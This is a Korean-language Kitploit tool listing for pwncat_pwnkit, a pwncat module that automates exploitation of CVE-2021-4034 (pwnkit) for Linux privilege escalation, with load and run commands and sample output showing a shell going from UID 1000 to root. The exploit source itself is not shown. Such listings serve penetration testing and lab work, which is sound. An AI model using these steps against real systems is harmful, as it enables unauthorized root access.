Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
pwncat_pwnkit — pwncat 모듈로 CVE-2021-4034(pwnkit)를 자동으로 익스플로잇합니다. | Kitploit
도구/GitHubGitHub/danaepp/pwncat_pwnkit
Privilege EscalationExploit FrameworksVulnerability AnalysisExploitationPost-ExploitationPenetration Testing
GitHubdanaepp/pwncat_pwnkit

pwncat_pwnkit

pwncat 모듈로 CVE-2021-4034(pwnkit)를 자동으로 익스플로잇합니다.

저장소 보기
3284년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

pwncat_pwnkit

asciicast

소개

이 모듈의 목적은 pwncat 사용 시 대상에서 CVE-2021-4034(pwnkit)를 악용하는 것입니다.

디렉터리를 설정하거나 소스를 컴파일하거나 원격 대상에 gcc가 설치되어 있을 필요가 없습니다. pwnkit 모듈은 pwncat 프레임워크를 사용하여 이를 자동으로 처리합니다.

설정 및 사용

  • pwnkit.py를 pwncat-cs가 설치된 호스트의 아무 곳에나 복사하세요. 예: /home/user/pwncat_mods
  • pwncat에서 다음을 입력하세요: load /home/user/pwncat_mods
  • 모듈이 로드되었는지 확인하려면 search pwnkit을 입력하세요. 다음과 같은 결과가 표시되어야 합니다:
root@kitploit:~
(local) pwncat$ search pwnkit
                                                      Results                                                      
                   ╷                                                                                               
  Name             │ Description                                                                                   
 ══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════ 
  pwnkit           │ Exploit CVE-2021-4034 to privesc to root
  • 실행하려면 run pwnkit을 입력하세요. 성공하면 UID가 0으로 변경되고 root가 됩니다. 예:
root@kitploit:~
(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0)                            manager.py:955
           Module pwnkit completed successfully                                                          run.py:100
(local) pwncat$                                                                                                    
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)

팁

  • 매번 load를 호출하고 싶지 않다면, 모듈을 ~/.local/share/pwncat/modules에 배치하여 pwncat이 시작 시 자동으로 로드하도록 할 수 있습니다.
  • 크로스 컴파일러를 사용하여 호스트에서 익스플로잇을 빌드하고 대상에 업로드하려면 pwncatrc 파일에 cross 변수를 설정해야 합니다. 이 파일은 일반적으로 ~/.local/share/pwncat/pwncatrc`에 있습니다. 예:
root@kitploit:~
# Set the gcc path
set cross "/usr/bin/gcc"

감사의 말

개발자 관점에서 pwncat 프레임워크를 배우는 동안 도움을 준 Caleb Stewart에게 특별한 감사를 전합니다. 시간이 생기면 언젠가 이 모듈을 메인 pwncat escalate 모듈에 포함시키는 풀 리퀘스트를 보내겠습니다... 약속합니다. :-)

도구 다운로드